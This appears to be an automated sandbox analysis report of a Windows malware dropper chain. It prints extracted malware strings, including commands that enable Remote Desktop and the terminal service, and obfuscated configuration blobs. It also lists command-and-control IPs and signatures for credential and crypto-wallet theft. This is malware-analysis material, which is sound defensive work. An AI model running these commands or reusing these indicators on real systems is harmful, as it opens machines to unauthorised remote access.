                                      Source: futors.exe, 0000000E.00000000.1322997240.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: futors.exe, 0000000F.00000000.1324663777.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
                                      Source: futors.exe, 0000000F.00000000.1324663777.0000000000431000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setce0b89c831d45810d856da111e87cdbfc1ec479e5342a25940592acf24703eb297fe1526eb5d0adb2c58ee424dc8c89bd08e41OX62IhKuFI7qGQCjPgu0N4GqJCji5 TWIzZeejLghCVm1Lx=PWTzJy==WCPm9FWqLWQtaO==NWKtaO==QX21JRnjQ McGx==1rK191LwDcYXTN==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqV56o1U==W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydSVPi59EM5DLhezvBe2naP1GvW7Gi lTY5q==WqKu06QlFAaAAvMGLBbHLz3uO3u7W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3KrSqerKvWEzpEpL WLywW1Le4NP=W4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7CdN1Xv5cYn8CPafkHke2V3H1esdJ D11ydR0ji4wz LjZh2DPtfw==LZKUOTLNMabzMRnuMN==ZIux y==WIYUSy==T4KVc0F7frB7e6F7d7B70q 701x7eKB7f0T71KP701N7dLN7d627enP=07ymWA7h4wA1SZnefzZfeGnY07ymWA7h4wz=06mq A7h4wz=1Ht=1Xt=1Xx=1XB=V0uq9e==cLG1 BqsDm==cLG1 FO3Doa=117m1Kmt06QleLByd1CqgqaxN7u28UXXRKB+RKF+N5qtaUfm4dPoMChsKA==hE==LrKv8VS6RU==e67m9EywE98d6Dm=c6Kz9kXpEpLnTDnhT6K1QkHX3N2eO0bogDPoVWVc2A==WLywW1Le4KUa8Dv2SZOCRZSdMSbf8E47fjO=S1Oq kG=U6uA EXv5SwYCBn71d==TZCGSy==WKuvWEGdMSYc8UzegEe=TKYkaEavAvgeSd==SZOIODNxSEaXQMAMTTDQfjfVhQ==Sqa1WEXjRM8dTUy=VqYzaEarW6Yx8EawS6Yu90TsX6avOEXjRM8dTUy=OHtzJxSYF fXIN==eqx=f6x=S6YvaEXr6s4N9UraRfvogWnQ11ydeqRA1qYz9Q3hQNUaIvr8e0Pp2Gvo5XXpNV1yNWPuIQ2qFUeE907XRM8TFRHef0vqf2bQ106qQlCrd7yuIUTe6wH0CDV7eTO4LmH84KBeQBCrc0mm9kHqRJ3bKkPLN0ar6wYn8zRJhUvgRir83LyocZOmfKaw9gasQTUe8zRogEDg1WQDskXGFUduIQ2qDI3=NWPOze==R7Ck 
h2uNqexWu==S6YvaEXr6s4N9UraRfvcfHri10KdfJmAdmY5IVf06o4f60ziOUPteGLkO66g1ZR=W5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6KZZifEPV2XzEO0YhZHOAd1q2aEXvLcImTN==S6Yu FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1634294018.0000000000171000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: net start termservice
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1634294018.0000000000171000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090C1D6 sqlite3_clear_bindings,17_2_6090C1D6
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609254B1 sqlite3_bind_zeroblob,17_2_609254B1
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090F435 sqlite3_bind_parameter_index,17_2_6090F435
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609255D4 sqlite3_bind_text16,17_2_609255D4
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609255FF sqlite3_bind_text,17_2_609255FF
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60925686 sqlite3_bind_int64,17_2_60925686
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609256E5 sqlite3_bind_int,17_2_609256E5
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6092562A sqlite3_bind_blob,17_2_6092562A
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60925655 sqlite3_bind_null,17_2_60925655
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6092570B sqlite3_bind_double,17_2_6092570B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60925778 sqlite3_bind_value,17_2_60925778
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090577D sqlite3_bind_parameter_name,17_2_6090577D
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090576B sqlite3_bind_parameter_count,17_2_6090576B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6090EAE5 sqlite3_transfer_bindings,17_2_6090EAE5
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,18_2_006C1204
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,18_2_006C1806
MITRE ATT&CK Matrix (one tactic column per line; a number before a technique is the count the report shows for it, kept as extracted)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain
Execution: 121 Windows Management Instrumentation; 31 Native API; 2 Command and Scripting Interpreter; 11 Scheduled Task/Job; 2 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
Persistence: 1 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 11 Scheduled Task/Job; 11 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; 11 Scheduled Task/Job; 11 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Defense Evasion: 21 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 41 Obfuscated Files or Information; 331 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 File Deletion; 11 Masquerading; 2 Valid Accounts; 661 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection; 1 Mshta
Credential Access: 2 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 13 File and Directory Discovery; 4510 System Information Discovery; 1291 Security Software Discovery; 661 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery
Lateral Movement: 1 Remote Desktop Protocol; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: 11 Archive Collected Data; 41 Data from Local System; 1 Screen Capture; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection
Command and Control: 1 Ingress Tool Transfer; 2 Encrypted Channel; 1 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service

                                      Legend:

                                      • Process
                                      • Signature
                                      • Created File
                                      • DNS/IP Info
                                      • Is Dropped
                                      • Is Windows Process
                                      • Number of created Registry Values
                                      • Number of created Files
                                      • Visual Basic
                                      • Delphi
                                      • Java
                                      • .Net C# or VB.NET
                                      • C, C++ or other language
                                      • Is malicious
                                      • Internet
Behavior Graph
ID: 1639961; Sample: M6gQuZPvgY.exe; Start date: 16/03/2025; Architecture: WINDOWS; Score: 100
(Leading numbers are the graph's own node ids; the bracketed numbers after a process are its created-registry-value / created-file counts as extracted, see legend.)

2 Start
  Signatures: 168 Found malware configuration; 170 Malicious sample detected (through community Yara rule); 172 Antivirus detection for URL or domain; 174 30 other signatures
  Started: 9 rapes.exe [6 76]; 14 M6gQuZPvgY.exe [5]; 16 8e933e9d51.exe; 18 4 other processes

9 rapes.exe (started by 2)
  DNS/IP: 156 176.113.115.6 SELECTELRU Russian Federation; 158 176.113.115.7 SELECTELRU Russian Federation; 160 185.215.113.16 WHOLESALECONNECTIONSNL Portugal
  Dropped: 118 C:\Users\user\AppData\...\718edcc992.exe, PE32; 120 C:\Users\user\AppData\...\d101bd5267.exe, PE32; 122 C:\Users\user\AppData\...\0629403be8.exe, PE32; 130 15 other malicious files
  Signatures: 226 Creates multiple autostart registry keys; 228 Hides threads from debuggers; 230 Tries to detect sandboxes / dynamic malware analysis system (registry check); 232 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
  Started: 20 amnew.exe [4]; 24 8e933e9d51.exe; 26 m0wsoI3.exe; 37 3 other processes

14 M6gQuZPvgY.exe (started by 2)
  Dropped: 124 C:\Users\user\AppData\Local\...\rapes.exe, PE32; 126 C:\Users\user\...\rapes.exe:Zone.Identifier, ASCII
  Signatures: 234 Detected unpacking (changes PE section rights); 236 Contains functionality to start a terminal service; 238 Tries to evade debugger and weak emulator (self modifying code); 248 2 other signatures
  Started: 29 rapes.exe

16 8e933e9d51.exe (started by 2)
  Dropped: 128 C:\Users\user\AppData\Local\...\8kUU4r0rO.hta, HTML
  Signatures: 240 Creates HTA files
  Started: 31 mshta.exe; 33 cmd.exe

18 4 other processes (started by 2)
  Signatures: 242 Multi AV Scanner detection for dropped file; 244 Suspicious powershell command line found; 246 Tries to download and execute files (via powershell)
  Started: 35 powershell.exe

20 amnew.exe (started by 9)
  Dropped: 94 C:\Users\user\AppData\Local\...\futors.exe, PE32
  Signatures: 192 Multi AV Scanner detection for dropped file; 210 2 other signatures
  Started: 39 futors.exe [4 44]

24 8e933e9d51.exe (started by 9)
  Dropped: 96 C:\Users\user\AppData\Local\...\vlsMF3EOY.hta, HTML
  Signatures: 212 3 other signatures
  Started: 44 mshta.exe; 46 cmd.exe

26 m0wsoI3.exe (started by 9)
  DNS/IP: 162 188.114.97.3 CLOUDFLARENETUS European Union
  Dropped: 98 C:\ProgramData\vcruntime140.dll, PE32; 100 C:\ProgramData\softokn3.dll, PE32; 102 C:\ProgramData\nss3.dll, PE32; 106 5 other malicious files
  Signatures: 194 Detected unpacking (creates a PE file in dynamic memory); 196 Found evasive API chain (may stop execution after checking mutex); 214 6 other signatures
  Started: 48 cmd.exe

29 rapes.exe (started by 14)
  Signatures: 198 Detected unpacking (changes PE section rights); 216 5 other signatures

31 mshta.exe (started by 16)
  Signatures: 200 Suspicious powershell command line found; 202 Tries to download and execute files (via powershell)
  Started: 50 powershell.exe

33 cmd.exe (started by 16)
  Started: 56 2 other processes

35 powershell.exe (started by 18)
  Started: 52 conhost.exe

37 3 other processes (started by 9)
  DNS/IP: 164 172.67.172.37 CLOUDFLARENETUS United States; 166 23.197.127.21 AKAMAI-ASN1EU United States
  Dropped: 104 C:\Temp\J9hHfTRUK.hta, HTML
  Signatures: 204 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 206 Query firmware table information (likely to detect VMs); 208 Tries to detect sandboxes and other dynamic analysis tools (window names)
  Started: 54 mshta.exe; 58 6 other processes

39 futors.exe (started by 20)
  DNS/IP: 150 185.215.113.209 WHOLESALECONNECTIONSNL Portugal; 152 77.90.153.244 RAPIDNET-DEHaunstetterStr19DE Germany; 154 3 other IPs or domains
  Dropped: 108 C:\Users\user\AppData\Local\...\mrwipre12.exe, PE32+; 110 C:\Users\user\AppData\Local\...\crypted.exe, PE32; 112 C:\Users\user\AppData\Local\...\crypted.exe, PE32+; 116 11 other malicious files
  Signatures: 218 Contains functionality to start a terminal service
  Started: 60 trano1221.exe; 64 cronikxqqq.exe

44 mshta.exe (started by 24)
  Signatures: 220 Suspicious powershell command line found; 222 Tries to download and execute files (via powershell)
  Started: 66 powershell.exe

46 cmd.exe (started by 24)
  Signatures: 224 Uses schtasks.exe or at.exe to add and modify task schedules
  Started: 68 conhost.exe; 70 schtasks.exe

48 cmd.exe (started by 26)
  Started: 74 2 other processes

50 powershell.exe (started by 31)
  Dropped: 114 TempLFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE, PE32
  Started: 76 2 other processes

54 mshta.exe (started by 37)
  Started: 72 powershell.exe

58 6 other processes (started by 37)
  Started: 78 3 other processes

60 trano1221.exe (started by 39)
  Dropped: 132 C:\Users\...\backend_c.cp311-win_amd64.pyd, PE32+; 134 (entry cut off in the source)
C:\Users\user\...\_cffi.cp311-win_amd64.pyd, PE32+ 60->134 dropped 136 C:\Users\user\AppData\...\win32trace.pyd, PE32+ 60->136 dropped 142 80 other malicious files 60->142 dropped 250 Multi AV Scanner detection for dropped file 60->250 80 trano1221.exe 60->80         started        252 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 64->252 254 Injects a PE file into a foreign processes 64->254 83 cronikxqqq.exe 64->83         started        86 WerFault.exe 64->86         started        138 TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, PE32 66->138 dropped 256 Powershell drops PE file 66->256 88 TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE 66->88         started        90 conhost.exe 66->90         started        140 C:\Users\...\483d2fa8a0d53818306efeb32d3.exe, PE32 72->140 dropped 92 conhost.exe 72->92         started        signatures17 process18 dnsIp19 144 149.154.167.220 TELEGRAMRU United Kingdom 80->144 146 104.21.69.194 CLOUDFLARENETUS United States 83->146 176 Query firmware table information (likely to detect VMs) 83->176 178 Tries to harvest and steal ftp login credentials 83->178 180 Tries to harvest and steal browser information (history, passwords, etc) 83->180 182 Tries to steal Crypto Currency Wallets 83->182 148 40.69.147.202 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 86->148 184 Multi AV Scanner detection for dropped file 88->184 186 Detected unpacking (changes PE section rights) 88->186 188 Contains functionality to start a terminal service 88->188 190 4 other signatures 88->190 signatures20
